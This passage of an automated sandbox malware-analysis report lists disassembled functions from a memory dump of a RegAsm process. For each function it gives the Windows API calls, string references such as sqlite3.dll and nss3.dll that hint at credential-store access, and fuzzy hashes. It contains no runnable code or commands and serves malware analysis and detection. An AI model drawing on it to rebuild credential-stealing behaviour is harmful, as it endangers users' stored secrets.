                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                      Function 00410F10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                                                      • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1479990042-0
                                                                                                                                                                                                                      • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                                      • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                                                      Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                      • String ID: Ul@
                                                                                                                                                                                                                      • API String ID: 270934217-715280498
                                                                                                                                                                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                                                      Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 203655857-0
                                                                                                                                                                                                                      • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                                                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                                                      Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                      • API String ID: 3699762281-259020660
                                                                                                                                                                                                                      • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                                                      • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                                                                                                      Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                                                      • String ID: recovered %d pages from %s
                                                                                                                                                                                                                      • API String ID: 985450955-1623757624
                                                                                                                                                                                                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                                                                                      Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _ultoasprintf
                                                                                                                                                                                                                      • String ID: %s %s %s
                                                                                                                                                                                                                      • API String ID: 432394123-3850900253
                                                                                                                                                                                                                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                                                      Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409919
                                                                                                                                                                                                                      • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                      • String ID: N\@
                                                                                                                                                                                                                      • API String ID: 568519121-3851889168
                                                                                                                                                                                                                      • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                                                      • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                                                                                                                      Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                                                      Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _msizerealloc
                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                                                      Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                      • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                      • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                                                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                                                      Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                                                      Function 00410D0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                      • API String ID: 1029625771-543337301
                                                                                                                                                                                                                      • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                                      • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                                                                      Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                      • String ID: A4@$Server Details
                                                                                                                                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                                      Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                                      Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3110682361-0
                                                                                                                                                                                                                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                      Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                      Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                                      • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
